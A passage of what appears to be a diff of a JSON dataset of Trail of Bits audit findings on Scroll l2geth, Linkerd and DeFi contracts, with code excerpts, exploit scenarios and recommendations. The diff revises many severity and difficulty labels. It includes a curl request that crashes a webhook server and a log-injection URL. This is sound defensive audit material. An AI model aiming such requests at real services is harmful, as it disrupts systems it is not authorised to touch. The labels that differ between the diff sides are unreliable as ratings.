transactions to be added. If the circuit checker returns an error either for row consumption being too high or reasons unknown, the circuitCapacityReached flag is set to true (figure 1.1). case (errors.Is(err, circuitcapacitychecker.ErrTxRowConsumptionOverflow) && tx.IsL1MessageTx()): // Circuit capacity check: L1MessageTx row consumption too high, shift to the next from the account, // because we shouldn't skip the entire txs from the same account. // This is also useful for skipping \"problematic\" L1MessageTxs.
queueIndex := tx.AsL1MessageTx().QueueIndex log.Trace(\"Circuit capacity limit reached for a single tx\", \"tx\", tx.Hash().String(), \"queueIndex\", queueIndex) log.Info(\"Skipping L1 message\", \"queueIndex\", queueIndex, \"tx\", tx.Hash().String(), \"block\", w.current.header.Number, \"reason\", \"row consumption overflow\") w.current.nextL1MsgIndex = queueIndex + 1 // after `ErrTxRowConsumptionOverflow`, ccc might not revert updates // associated with this transaction so we cannot pack more transactions. // TODO: fix this in ccc and change these lines back to `txs.Shift()` circuitCapacityReached = true break loop case (errors.Is(err, circuitcapacitychecker.ErrTxRowConsumptionOverflow) && !tx.IsL1MessageTx()): // Circuit capacity check: L2MessageTx row consumption too high, skip the account. // This is also useful for skipping \"problematic\" L2MessageTxs. log.Trace(\"Circuit capacity limit reached for a single tx\", \"tx\", tx.Hash().String()) // after `ErrTxRowConsumptionOverflow`, ccc might not revert updates // associated with this transaction so we cannot pack more transactions. // TODO: fix this in ccc and change these lines back to `txs.Pop()` circuitCapacityReached = true break loop case (errors.Is(err, circuitcapacitychecker.ErrUnknown) && tx.IsL1MessageTx()): // Circuit capacity check: unknown circuit capacity checker error for L1MessageTx, // shift to the next from the account because we shouldn't skip the entire txs from the same account queueIndex := tx.AsL1MessageTx().QueueIndex log.Trace(\"Unknown circuit capacity checker error for L1MessageTx\", \"tx\", tx.Hash().String(), \"queueIndex\", queueIndex) log.Info(\"Skipping L1 message\", \"queueIndex\", queueIndex, \"tx\", tx.Hash().String(), \"block\", w.current.header.Number, \"reason\", \"unknown row consumption error\") w.current.nextL1MsgIndex = queueIndex + 1 // after `ErrUnknown`, ccc might not revert updates associated // with this transaction so we cannot pack more transactions. // TODO: fix this in ccc and change these lines back to `txs.Shift()` circuitCapacityReached = true break loop case (errors.Is(err, circuitcapacitychecker.ErrUnknown) && !tx.IsL1MessageTx()): // Circuit capacity check: unknown circuit capacity checker error for L2MessageTx, skip the account log.Trace(\"Unknown circuit capacity checker error for L2MessageTx\", \"tx\", tx.Hash().String()) // after `ErrUnknown`, ccc might not revert updates associated // with this transaction so we cannot pack more transactions. // TODO: fix this in ccc and change these lines back to `txs.Pop()` circuitCapacityReached = true break loop Figure 1.1: Error handling for the circuit capacity checker (worker.go#L1073-L1121) When this flag is set to true, no new transactions will be added even if there is room for additional transactions in the block (figure 1.2). // Fill the block with all available pending transactions. pending := w.eth.TxPool().Pending(true) // Short circuit if there is no available pending transactions. // But if we disable empty precommit already, ignore it. Since // empty block is necessary to keep the liveness of the network.
if len(pending) == 0 && pendingL1Txs == 0 && atomic.LoadUint32(&w.noempty) == 0 { w.updateSnapshot() return } // Split the pending transactions into locals and remotes localTxs, remoteTxs := make(map[common.Address]types.Transactions), pending for _, account := range w.eth.TxPool().Locals() { if txs := remoteTxs[account]; len(txs) > 0 { delete(remoteTxs, account) localTxs[account] = txs } } var skipCommit, circuitCapacityReached bool if w.chainConfig.Scroll.ShouldIncludeL1Messages() && len(l1Txs) > 0 { log.Trace(\"Processing L1 messages for inclusion\", \"count\", pendingL1Txs) txs := types.NewTransactionsByPriceAndNonce(w.current.signer, l1Txs, header.BaseFee) skipCommit, circuitCapacityReached = w.commitTransactions(txs, w.coinbase, interrupt) if skipCommit { return } } if len(localTxs) > 0 && !circuitCapacityReached { txs := types.NewTransactionsByPriceAndNonce(w.current.signer, localTxs, header.BaseFee) skipCommit, circuitCapacityReached = w.commitTransactions(txs, w.coinbase, interrupt) if skipCommit { return } } if len(remoteTxs) > 0 && !circuitCapacityReached { txs := types.NewTransactionsByPriceAndNonce(w.current.signer, remoteTxs, header.BaseFee) // don't need to get `circuitCapacityReached` here because we don't have further `commitTransactions` // after this one, and if we assign it won't take effect (`ineffassign`) skipCommit, _ = w.commitTransactions(txs, w.coinbase, interrupt) if skipCommit { return } } // do not produce empty blocks if w.current.tcount == 0 { return } w.commit(uncles, w.fullTaskHook, true, tstart) Figure 1.2: Pending transactions are not added if the circuit capacity has been reached. (worker.go#L1284-L1332) Exploit Scenario Eve, an attacker, sends an L2 transaction that uses ecrecover many times. The transaction is provided to the mempool with enough gas to be the first L2 transaction in the block. Because this causes an error in the circuit checker, it prevents all other L2 transactions from being executed in this block. Recommendations Short term, implement a snapshotting mechanism in the circuit checker to roll back unexpected changes made as a result of incorrect or incomplete computation. Long term, analyze and document all impacts of error handling across the system to ensure that these errors are handled gracefully. Additionally, clearly document all expected invariants of how the system is expected to behave to ensure that in interactions with other components, these invariants hold throughout the system.", "labels": [ "Trail of Bits", "Severity: High", "Difficulty: Low" ] }, { "title": "2. Unused and dead code ", "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-08-scrollL2geth-securityreview.pdf", "body": "Due to the infrastructure setup of this network and the use of a single-node clique setup, this fork of geth contains a significant amount of unused logic. Continuing to maintain this code can be problematic and may lead to issues. The following are examples of unused and dead code: Uncle blocks: with a single-node clique network, there is no chance for uncle blocks to exist, so all the logic that handles and interacts with uncle blocks can be dropped. Redundant logic around updating the L1 queue index A redundant check on empty blocks in the worker.go file Recommendations Short term, remove anything that is no longer relevant for the current go-ethereum implementation and be sure to document all the changes to the codebase.
Long term, remove all unused code from the codebase.", "labels": [ "Trail of Bits", "Severity: Informational", "Difficulty: N/A" ] }, { "title": "3. Lack of documentation ", "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-08-scrollL2geth-securityreview.pdf", "body": "Certain areas of the codebase lack documentation, high-level descriptions, and examples, which makes the code difficult to review and increases the likelihood of user mistakes. Areas that would benefit from being expanded and clarified in code and documentation include the following: Internals of the CCC. Despite being treated as a black box, the code relies on stateful changes made from geth calls. This suggests that the internal states of the miner's work and the CCC overlap. The lack of documentation regarding these states creates a lack of visibility in evaluating whether there are potential state corruptions or unexpected behavior. Circumstances where transactions are skipped and how they are expected to be handled. During the course of the review, we attempted to reverse engineer the intended behavior of transactions considered skipped by the CCC. The lack of documentation in these areas results in unclear expectations for this code. Error handling standard throughout the system. The codebase handles system errors differently; in some cases, it logs an error and continues execution, and in others it only logs traces. Listing out all instances where errors are identified and documenting how they are handled can help ensure that there is no unexpected behavior related to error handling. The documentation should include all expected properties and assumptions relevant to the aforementioned aspects of the codebase. Recommendations Short term, review and properly document the aforementioned aspects of the codebase. In addition to external documentation, NatSpec and inline code comments could help clarify complexities. Long term, consider writing a formal specification of the protocol. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and difficulty levels used in this document. Vulnerability Categories Category", "labels": [ "Trail of Bits", "Severity: Informational", "Difficulty: N/A" ] }, { "title": "1. Various unhandled errors ", "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Linkerd-securityreview.pdf", "body": "The linkerd codebase contains various methods with unhandled errors. In most cases, errors returned by functions are simply not checked; in other cases, functions that surround deferred error-returning functions do not capture the relevant errors. Using gosec and errcheck, we detected a large number of such cases, which we cannot enumerate in this report. We recommend running these tools to uncover and resolve these cases. Figures 1.1 and 1.2 provide examples of functions in the codebase with unhandled errors: func (h *handler) handleProfileDownload(w http.ResponseWriter, req *http.Request, params httprouter.Params) { [...] w.Write(profileYaml.Bytes()) } Figure 1.1: web/srv/handlers.go#L65-L91 func renderStatStats(rows []*pb.StatTable_PodGroup_Row, options *statOptions) string { [...] writeStatsToBuffer(rows, w, options) w.Flush() [...] } Figure 1.2: viz/cmd/stat.go#L295-L302 We could not determine the severity of all of the unhandled errors detected in the codebase. Exploit Scenario While an operator of the Linkerd infrastructure interacts with the system, an uncaught error occurs.
Due to the lack of error reporting, the operator is unaware that the operation did not complete successfully, and he produces further undefined behavior. Recommendations Short term, run gosec and errcheck across the codebase. Resolve all issues pertaining to unhandled errors by checking them explicitly. Long term, ensure that all functions that return errors have explicit checks for these errors. Consider integrating the abovementioned tooling into the CI/CD pipeline to prevent undefined behavior from occurring in the affected code paths.", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Undetermined", "Difficulty: High" ] }, @@ -536,7 +506,7 @@ "labels": [ "Trail of Bits", "Severity: Undetermined", - "Difficulty: Low" + "Difficulty: Undetermined" ] }, { @@ -545,7 +515,7 @@ "body": "The runCheck function, responsible for performing health checks for various services, performs its core functions inside of an infinite for loop. runCheck is called with a timeout stored in a context object. The cancel() function is deferred at the beginning of the loop. Calling defer inside of a loop could cause resource exhaustion conditions because the deferred function is called when the function exits, not at the end of each loop iteration. As a result, resources from each context object are accumulated until the end of the for statement. While this may not cause noticeable issues in the current state of the application, it is best to call cancel() at the end of each loop iteration to prevent unforeseen issues. func (hc *HealthChecker) runCheck(category *Category, c *Checker, observer CheckObserver) bool { for { ctx, cancel := context.WithTimeout(context.Background(), RequestTimeout) defer cancel() err := c.check(ctx) if se, ok := err.(*SkipError); ok { log.Debugf(\"Skipping check: %s. Reason: %s\", c.description, se.Reason) return true } Figure 4.1: pkg/healthcheck/healthcheck.go#L1619-L1628 Recommendations Short term, rather than deferring the call to cancel(), add a call to cancel() at the end of the loop.", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: Informational", "Difficulty: High" ] }, @@ -575,7 +545,7 @@ "body": "Requests sent to the TAP service API endpoint, /apis/tap, via the POST method are handled by the handleTap method. This method parses a namespace and a name obtained from the URL of the request. Both the namespace and name variables are then used in a log statement for printing debugging messages to standard output. Because both fields are user-controllable, an attacker could perform log injection attacks by calling such API endpoints with a namespace or name with newline indicators, such as \\n. func (h *handler) handleTap(w http.ResponseWriter, req *http.Request, p httprouter.Params) { namespace := p.ByName(\"namespace\") name := p.ByName(\"name\") resource := \"\" // (...) h.log.Debugf(\"SubjectAccessReview: namespace: %s, resource: %s, name: %s, user: <%s>, group: <%s>\", namespace, resource, name, h.usernameHeader, h.groupHeader, ) Figure 7.1: viz/tap/api/handlers.go#L106-L125 Exploit Scenario An attacker submits a POST request to the TAP service API using the URL /apis/tap.linkerd.io/v1alpha1/watch/myns\\nERRO[0000]/tap, causing invalid logs to be printed and tricking an operator into falsely believing there is a failure. Recommendations Short term, ensure that all user-controlled input is sanitized before it is used in the logging function.
Additionally, use the format specifier %q instead of %s to prompt Go to perform basic sanitization of strings.", "labels": [ "Trail of Bits", - "Severity: High", + "Severity: Low", "Difficulty: High" ] }, @@ -585,7 +555,7 @@ "body": "Transport Layer Security (TLS) is used in multiple locations throughout the codebase. In two cases, TLS configurations do not have a minimum version requirement, allowing connections from TLS 1.0 and later. This may leave the webhook and TAP API servers vulnerable to protocol downgrade and man-in-the-middle attacks. // NewServer returns a new instance of Server func NewServer( ctx context.Context, api *k8s.API, addr, certPath string, handler Handler, component string, ) (*Server, error) { [...] server := &http.Server{ Addr: addr, TLSConfig: &tls.Config{}, } Figure 8.1: controller/webhook/server.go#L43-L64 // NewServer creates a new server that implements the Tap APIService. func NewServer( ctx context.Context, addr string, k8sAPI *k8s.API, grpcTapServer pb.TapServer, disableCommonNames bool, ) (*Server, error) { [...] httpServer := &http.Server{ Addr: addr, TLSConfig: &tls.Config{ ClientAuth: tls.VerifyClientCertIfGiven, ClientCAs: clientCertPool, }, } Figure 8.2: viz/tap/api/sever.go#L34-L76 Exploit Scenario Due to the lack of minimum TLS version enforcement, certain established connections lack sufficient authentication and cryptography. These connections do not protect against man-in-the-middle attacks. Recommendations Short term, review all TLS configurations and ensure the MinVersion field is set to require connections to be TLS 1.2 or newer. Long term, ensure that all TLS configurations across the codebase enforce a minimum version requirement and employ verification where possible.", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Low", "Difficulty: High" ] }, @@ -595,7 +565,7 @@ "body": "The webhook server's processReq function, used for handling admission review requests, does not properly validate request objects. As a result, malformed requests result in nil dereferences, which cause panics on the server. If the server receives a request with a body that cannot be decoded by the decode function, shown below, an error is returned, and a panic is triggered when the system attempts to access the Request object in line 154. A panic could also occur if the request is decoded successfully into an AdmissionReview object with a missing Request property. In such a case, the panic would be triggered in line 162. 149 func (s *Server) processReq(ctx context.Context, data []byte) *admissionv1beta1.AdmissionReview { 150 admissionReview, err := decode(data) 151 if err != nil { 152 log.Errorf(\"failed to decode data. Reason: %s\", err) 153 admissionReview.Response = &admissionv1beta1.AdmissionResponse{ 154 UID: admissionReview.Request.UID, 155 Allowed: false, 156 Result: &metav1.Status{ 157 Message: err.Error(), 158 }, 159 } 160 return admissionReview 161 } 162 log.Infof(\"received admission review request %s\", admissionReview.Request.UID) 163 log.Debugf(\"admission request: %+v\", admissionReview.Request) Figure 9.1: controller/webhook/server.go#L149-L163 We tested the panic by getting a shell on a container running in the application namespace and issuing the request in figure 9.2. However, the Go server recovers from the panics without negatively impacting the application. 
curl -i -s -k -X $'POST' -H $'Host: 10.100.137.130:443' -H $'Accept: */*' -H $'Content-Length: 6' --data-binary $'aaaaaa' $'https://10.100.137.130:443/inject/test' Figure 9.2: The curl request that causes a panic Recommendations Short term, add checks to verify that request objects are not nil before and after they are decoded. Long term, run the invalid-usage-of-modified-variable rule from the set of Semgrep rules in the CI/CD pipeline to detect this type of bug.", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: Informational", "Difficulty: High" ] }, @@ -615,7 +585,7 @@ "body": "The lower bound on a collateral asset's initial weight (when the collateral is first whitelisted) is different from that enforced if the weight is updated; this discrepancy increases the likelihood of collateral seizures by liquidators. A collateral asset's weight represents the level of risk associated with accepting that asset as collateral. This risk calculation comes into play when the protocol is assessing whether a liquidator can seize a user's non-UA collateral. To determine the value of each collateral asset, the protocol multiplies the user's balance of that asset by the collateral weight (a percentage). A riskier asset will have a lower weight and thus a lower value. If the total value of a user's non-UA collateral is less than the user's UA debt, a liquidator can seize the collateral. When whitelisting a collateral asset, the Perpetual.addWhiteListedCollateral function requires the collateral weight to be between 10% and 100% (figure 2.1). According to the documentation, these are the correct bounds for a collateral asset's weight. function addWhiteListedCollateral ( IERC20Metadata asset, uint256 weight, uint256 maxAmount ) public override onlyRole(GOVERNANCE) { if (weight < 1e17) revert Vault_InsufficientCollateralWeight(); if (weight > 1e18) revert Vault_ExcessiveCollateralWeight(); [...] } Figure 2.1: A snippet of the addWhiteListedCollateral function in Vault.sol#L224-230 However, governance can choose to update that weight via a call to Perpetual.changeCollateralWeight, which allows the weight to be between 1% and 100% (figure 2.2). function changeCollateralWeight (IERC20Metadata asset, uint256 newWeight) external override onlyRole(GOVERNANCE) { uint256 tokenIdx = tokenToCollateralIdx[asset]; if (!((tokenIdx != 0) || (address(asset) == address(UA)))) revert Vault_UnsupportedCollateral(); if (newWeight < 1e16) revert Vault_InsufficientCollateralWeight(); if (newWeight > 1e18) revert Vault_ExcessiveCollateralWeight(); [...] } Figure 2.2: A snippet of the changeCollateralWeight function in Vault.sol#L254-259 If the weight of a collateral asset were mistakenly set to less than 10%, the value of that collateral would decrease, thereby increasing the likelihood of seizures of non-UA collateral. Exploit Scenario Alice, who holds the governance role, decides to update the weight of a collateral asset in response to volatile market conditions. By mistake, Alice sets the weight of the collateral to 1% instead of 10%. As a result of this change, Bob's non-UA collateral assets decrease in value and are seized. Recommendations Short term, change the lower bound on newWeight in the changeCollateralWeight function from 1e16 to 1e17. 
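A minimal sketch of the corrected check, mirroring the bound that addWhiteListedCollateral already enforces in figure 2.1: if (newWeight < 1e17) revert Vault_InsufficientCollateralWeight(); if (newWeight > 1e18) revert Vault_ExcessiveCollateralWeight(); 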
Long term, expand the unit test suite to cover additional edge cases and to ensure that the system behaves as expected.", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: Medium", "Difficulty: High" ] }, @@ -625,7 +595,7 @@ "body": "The Increment Protocol contracts have enabled optional compiler optimizations in Solidity. There have been several optimization bugs with security implications. Moreover, optimizations are actively being developed. Solidity compiler optimizations are disabled by default, and it is unclear how many contracts in the wild actually use them. Therefore, it is unclear how well they are being tested and exercised. Security issues due to optimization bugs have occurred in the past. A medium- to high-severity bug in the Yul optimizer was introduced in Solidity version 0.8.13 and was fixed only recently, in Solidity version 0.8.17. Another medium-severity optimization bug, one that caused memory writes in inline assembly blocks to be removed under certain conditions, was patched in Solidity 0.8.15. A compiler audit of Solidity from November 2018 concluded that the optional optimizations may not be safe. It is likely that there are latent bugs related to optimization and that new bugs will be introduced due to future optimizations. Exploit Scenario A latent or future bug in Solidity compiler optimizations causes a security vulnerability in the Increment Protocol contracts. Recommendations Short term, measure the gas savings from optimizations and carefully weigh them against the possibility of an optimization-related bug. Long term, monitor the development and adoption of Solidity compiler optimizations to assess their maturity.", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: Informational", "Difficulty: High" ] }, @@ -636,7 +606,7 @@ "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: High" + "Difficulty: Low" ] }, { @@ -656,7 +626,7 @@ "labels": [ "Trail of Bits", "Severity: High", - "Difficulty: High" + "Difficulty: Low" ] }, { @@ -665,7 +635,7 @@ "body": "The upper bound on the amount of funds considered dust by the protocol may lead to the premature closure of long positions. The protocol collects dust to encourage complete closures instead of closures that leave a position with a small balance of vBase. One place that dust collection occurs is the Perpetual contract's _reducePositionOnMarket function (figure 7.1). function _reducePositionOnMarket ( LibPerpetual.TraderPosition memory user, bool isLong, uint256 proposedAmount, uint256 minAmount ) internal returns ( int256 baseProceeds, int256 quoteProceeds, int256 addedOpenNotional, int256 pnl ) { int256 positionSize = int256(user.positionSize); uint256 bought; uint256 feePer; if (isLong) { quoteProceeds = -(proposedAmount.toInt256()); (bought, feePer) = _quoteForBase(proposedAmount, minAmount); baseProceeds = bought.toInt256(); } else { (bought, feePer) = _baseForQuote(proposedAmount, minAmount); quoteProceeds = bought.toInt256(); baseProceeds = -(proposedAmount.toInt256()); } int256 netPositionSize = baseProceeds + positionSize; if (netPositionSize > 0 && netPositionSize <= 1e17) { _donate(netPositionSize.toUint256()); baseProceeds -= netPositionSize; } [...] } Figure 7.1: The _reducePositionOnMarket function in Perpetual.sol#L876-921 If netPositionSize, which represents a user's position after its reduction, is between 0 and 1e17 (1/10 of an 18-decimal token), the system will treat the position as closed and donate the dust to the insurance protocol. 
This will occur regardless of whether the user intended to reduce, rather than fully close, the position. (Note that netPositionSize is positive if the overall position is long. The dust collection mechanism used for short positions is discussed in TOB-INC-11.) However, if netPositionSize is tracking a high-value token, the donation to Insurance will no longer be insignificant; 1/10 of 1 vBTC, for instance, would be worth ~USD 2,000 (at the time of writing). Thus, the donation of a user's vBTC dust (and the resultant closure of the vBTC position) could prevent the user from profiting from a ~USD 2,000 position. Exploit Scenario Alice, who holds a long position in the vBTC / vUSD market, decides to close most of her position. After the swap, netPositionSize is slightly less than 1e17. Since a leftover balance of that amount is considered dust (unbeknownst to Alice), her ~1e17 vBTC tokens are sent to the Insurance contract, and her position is fully closed. Recommendations Short term, have the protocol calculate the notional value of netPositionSize by multiplying it by the return value of the indexPrice function. Then have it compare that notional value to the dust thresholds. Note that the dust thresholds must also be expressed in the notional token and that the comparison should not lead to a significant decrease in a user's position. Long term, document this system edge case to inform users that a fraction of their long positions may be donated to the Insurance contract after being reduced.", "labels": [ "Trail of Bits", - "Severity: High", + "Severity: Medium", "Difficulty: Medium" ] }, @@ -675,8 -645,8 @@ "body": "The protocol's use of primitive operations over fixed-point signed and unsigned integers increases the risk of overflows and undefined behavior. The Increment Protocol uses the PRBMathSD59x18 and PRBMathUD60x18 math libraries to perform operations over 59x18 signed integers and 60x18 unsigned integers, respectively (specifically to perform multiplication and division and to find their absolute values). These libraries aid in calculations that involve percentages or ratios or require decimal precision. When a smart contract system relies on primitive integers and fixed-point ones, it should avoid arithmetic operations that involve the use of both types. For example, using x.wadMul(y) to multiply two fixed-point integers will provide a different result than using x * y. For that reason, great care must be taken to differentiate between variables that are fixed-point and those that are not. Calculations involving fixed-point values should use the provided library operations; calculations involving both fixed-point and primitive integers should be avoided unless one type is converted to the other. However, a number of multiplication and division operations in the codebase use both primitive and fixed-point integers. These include those used to calculate the new time-weighted average prices (TWAPs) of index and market prices (figure 8.1). 
function _updateTwap() internal { uint256 currentTime = block.timestamp; int256 timeElapsed = (currentTime - globalPosition.timeOfLastTrade).toInt256(); /* priceCumulative1 = priceCumulative0 + price1 * timeElapsed // will overflow in ~3000 years */ // update cumulative chainlink price feed int256 latestChainlinkPrice = indexPrice(); oracleCumulativeAmount += latestChainlinkPrice * timeElapsed; // update cumulative market price feed int256 latestMarketPrice = marketPrice().toInt256(); marketCumulativeAmount += latestMarketPrice * timeElapsed; uint256 timeElapsedSinceBeginningOfPeriod = block.timestamp - globalPosition.timeOfLastTwapUpdate; if (timeElapsedSinceBeginningOfPeriod >= twapFrequency) { /* TWAP = (priceCumulative1 - priceCumulative0) / timeElapsed */ // calculate chainlink twap oracleTwap = ((oracleCumulativeAmount - oracleCumulativeAmountAtBeginningOfPeriod) / timeElapsedSinceBeginningOfPeriod.toInt256()).toInt128(); // calculate market twap marketTwap = ((marketCumulativeAmount - marketCumulativeAmountAtBeginningOfPeriod) / timeElapsedSinceBeginningOfPeriod.toInt256()).toInt128(); // reset cumulative amount and timestamp oracleCumulativeAmountAtBeginningOfPeriod = oracleCumulativeAmount; marketCumulativeAmountAtBeginningOfPeriod = marketCumulativeAmount; globalPosition.timeOfLastTwapUpdate = block.timestamp.toUint64(); emit TwapUpdated(oracleTwap, marketTwap); } } Figure 8.1: The _updateTwap function in Perpetual.sol#L1071-1110 Similarly, the _getUnrealizedPnL function in the Perpetual contract calculates the tradingFees value by multiplying a primitive and a fixed-point integer (figure 8.2). function _getUnrealizedPnL(LibPerpetual.TraderPosition memory trader) internal view returns (int256) { int256 oraclePrice = indexPrice(); int256 vQuoteVirtualProceeds = int256(trader.positionSize).wadMul(oraclePrice); int256 tradingFees = (vQuoteVirtualProceeds.abs() * market.out_fee().toInt256()) / CURVE_TRADING_FEE_PRECISION; // @dev: take upper bound on the trading fees // in the case of a LONG, trader.openNotional is negative but vQuoteVirtualProceeds is positive // in the case of a SHORT, trader.openNotional is positive while vQuoteVirtualProceeds is negative return int256(trader.openNotional) + vQuoteVirtualProceeds - tradingFees; } Figure 8.2: The _getUnrealizedPnL function in Perpetual.sol#L1175-1183 These calculations can lead to unexpected overflows or cause the system to enter an undefined state. Note that there are other such calculations in the codebase that are not documented in this finding. Recommendations Short term, identify all state variables that are fixed-point signed or unsigned integers. Additionally, ensure that all multiplication and division operations involving those state variables use the wadMul and wadDiv functions, respectively. If the Increment Finance team decides against using wadMul or wadDiv in any of those operations (whether to optimize gas or for another reason), it should provide inline documentation explaining that decision.", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: Medium" + "Severity: Informational", + "Difficulty: High" ] }, { @@ -685,8 +655,8 @@ "body": "Token swaps that are performed to liquidate a position use a hard-coded zero as the minimum-amount-out value, making them vulnerable to sandwich attacks. The minimum-amount-out value indicates the minimum amount of tokens that a user will receive from a swap. The value is meant to provide protection against pool illiquidity and sandwich attacks. 
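As a minimal illustration of the guard that such a value normally provides (hypothetical names, not the protocol's code): uint256 amountOut = pool.swap(tokenIn, tokenOut, amountIn); require(amountOut >= minAmountOut, \"insufficient output\"); with minAmountOut hard-coded to zero, this check can never fail, so the swap accepts arbitrarily poor output. 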
Senders of position and liquidity provision updates are allowed to specify a minimum amount out. However, the minimum-amount-out value used in liquidations of both traders' and liquidity providers' positions is hard-coded to zero. Figures 9.1 and 9.2 show the functions that perform these liquidations (_liquidateTrader and _liquidateLp, respectively). function _liquidateTrader( uint256 idx, address liquidatee, uint256 proposedAmount ) internal returns (int256 pnL, int256 positiveOpenNotional) { (positiveOpenNotional) = int256(_getTraderPosition(idx, liquidatee).openNotional).abs(); LibPerpetual.Side closeDirection = _getTraderPosition(idx, liquidatee).positionSize >= 0 ? LibPerpetual.Side.Short : LibPerpetual.Side.Long; // (liquidatee, proposedAmount) (, , pnL, ) = perpetuals[idx].changePosition(liquidatee, proposedAmount, 0, closeDirection, true); // traders are allowed to reduce their positions partially, but liquidators have to close positions in full if (perpetuals[idx].isTraderPositionOpen(liquidatee)) revert ClearingHouse_LiquidateInsufficientProposedAmount(); return (pnL, positiveOpenNotional); } Figure 9.1: The _liquidateTrader function in ClearingHouse.sol#L522-541 function _liquidateLp ( uint256 idx, address liquidatee, uint256 proposedAmount ) internal returns (int256 pnL, int256 positiveOpenNotional) { positiveOpenNotional = _getLpOpenNotional(idx, liquidatee).abs(); // close lp (pnL, , ) = perpetuals[idx].removeLiquidity( liquidatee, _getLpLiquidity(idx, liquidatee), [uint256(0), uint256(0)], proposedAmount, 0, true ); _distributeLpRewards(idx, liquidatee); return (pnL, positiveOpenNotional); } Figure 9.2: The _liquidateLp function in ClearingHouse.sol#L543-562 Without the ability to set a minimum amount out, liquidators are not guaranteed to receive any tokens from the pool during a swap. If a liquidator does not receive the correct amount of tokens, he or she will be unable to close the position, and the transaction will revert; the revert will also prolong the Increment Protocol's exposure to debt. Moreover, liquidators will be discouraged from participating in liquidations if they know that they may be subject to sandwich attacks and may lose money in the process. Exploit Scenario Alice, a liquidator, notices that a position is no longer valid and decides to liquidate it. When she sends the transaction, the protocol sets the minimum-amount-out value to zero. Eve's sandwich bot identifies Alice's liquidation as a pure profit opportunity and sandwiches it with transactions. Alice's liquidation fails, and the protocol remains in a state of debt. Recommendations Short term, allow liquidators to specify a minimum-amount-out value when liquidating the positions of traders and liquidity providers. Long term, document all cases in which front-running may be possible, along with the implications of front-running for the codebase.", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: Low" + "Severity: Medium", + "Difficulty: High" ] }, { @@ -695,8 +665,8 @@ "body": "The oracle and market TWAPs can be updated only during traders' and liquidity providers' interactions with the protocol; a downtick in user interactions will result in less accurate TWAPs that are more susceptible to manipulation. The accuracy of a TWAP is related to the number of data points available for the average price calculation. The less often prices are logged, the less robust the TWAP becomes. 
In the case of the Increment Protocol, a TWAP can be updated with each block that contains a trader or liquidity provider interaction. However, during a market slump (i.e., a time of reduced network traffic), there will be fewer user interactions and thus fewer price updates. TWAP updates are performed by the Perpetual._updateTwap function, which is called by the internal Perpetual._updateGlobalState function. Other protocols, though, take a different approach to keeping markets up to date. The Compound Protocol, for example, has an accrueInterest function that is called upon every user interaction but is also a standalone public function that anyone can call. Recommendations Short term, create a public updateGlobalState function that anyone can call to internally call _updateGlobalState. Long term, create an off-chain worker that can alert the team to periods of perpetual market inactivity, ensuring that the team knows to update the market accordingly. 11. Liquidations of short positions may fail because of insufficient dust collection Severity: Low Difficulty: High Type: Data Validation Finding ID: TOB-INC-11 Target: contracts/Perpetual.sol", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: Low" + "Severity: Informational", + "Difficulty: High" ] }, { @@ -705,7 +675,7 @@ "body": "Although dependency scans did not identify a direct threat to the project under review, yarn audit identified dependencies with known vulnerabilities. Due to the sensitivity of the deployment code and its environment, it is important to ensure that dependencies are not malicious. Problems with dependencies in the JavaScript community could have a significant effect on the repository under review. The output below details the high-severity vulnerabilities: CVE ID", "labels": [ "Trail of Bits", - "Severity: High", + "Severity: Low", "Difficulty: High" ] }, @@ -715,7 +685,7 @@ "body": "Under extreme market conditions, the Chainlink oracle may cease to work as expected, causing unexpected behavior in the Increment Protocol. Such oracle issues have occurred in the past. For example, during the LUNA market crash, the Venus protocol was exploited because Chainlink stopped providing up-to-date prices. The interruption occurred because the price of LUNA dropped below the minimum price (minAnswer) allowed by the LUNA / USD price feed on the BNB chain. As a result, all oracle updates reverted. Chainlink's automatic circuit breakers, which pause price feeds during extreme market conditions, could pose similar problems. Note that these kinds of events cannot be tracked on-chain. If a price feed is paused, updatedAt will still be greater than zero, and answeredInRound will still be equal to roundID. Thus, the Increment Finance team should implement an off-chain monitoring solution to detect any anomalous behavior exhibited by Chainlink oracles. 
The monitoring solution should check for the following conditions and issue alerts if they occur, as they may be indicative of abnormal market events: an asset price that is approaching the minAnswer or maxAnswer value; the suspension of a price feed by an automatic circuit breaker; and any large deviations in the price of an asset. References: Chainlink: Risk Mitigation; Chainlink: Monitoring Data Feeds; Chainlink: Circuit Breakers", "labels": [ "Trail of Bits", - "Severity: High", + "Severity: Informational", "Difficulty: High" ] }, @@ -746,7 +716,7 @@ "labels": [ "Trail of Bits", "Severity: Medium", - "Difficulty: Low" + "Difficulty: High" ] }, { @@ -755,8 +725,8 @@ "body": "The contracts use Solidity's ABIEncoderV2, which is enabled by default in Solidity version 0.8. This encoder has caused numerous issues in the past, and its use may still pose risks. More than 3% of all GitHub issues for the Solidity compiler are related to current or former experimental features, primarily ABIEncoderV2, which was long considered experimental. Several issues and bug reports are still open and unresolved. ABIEncoderV2 has been associated with more than 20 high-severity bugs, some of which are so recent that they have not yet been included in a Solidity release. For example, in March 2019 a severe bug introduced in Solidity 0.5.5 was found in the encoder. Exploit Scenario The Yield Protocol smart contracts are deployed. After the deployment, a bug is found in the encoder, which means that the contracts are broken and can all be exploited in the same way. Recommendations Short term, use neither ABIEncoderV2 nor any experimental Solidity feature. Refactor the code such that structs do not need to be passed to or returned from functions. Long term, integrate static analysis tools like Slither into the continuous integration pipeline to detect unsafe pragmas.", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: Medium" + "Severity: Undetermined", + "Difficulty: Low" ] }, { @@ -775,7 +745,7 @@ "body": "The buy and payAll functions in the Witch contract enable users to buy collateral at an auction. However, neither function checks whether there is an active auction for the collateral of a vault. As a result, anyone can buy collateral from any vault. This issue also creates an arbitrage opportunity, as the collateral of an overcollateralized vault can be bought at a below-market price. An attacker could drain vaults of their funds and turn a profit through repeated arbitrage. Exploit Scenario Alice, a 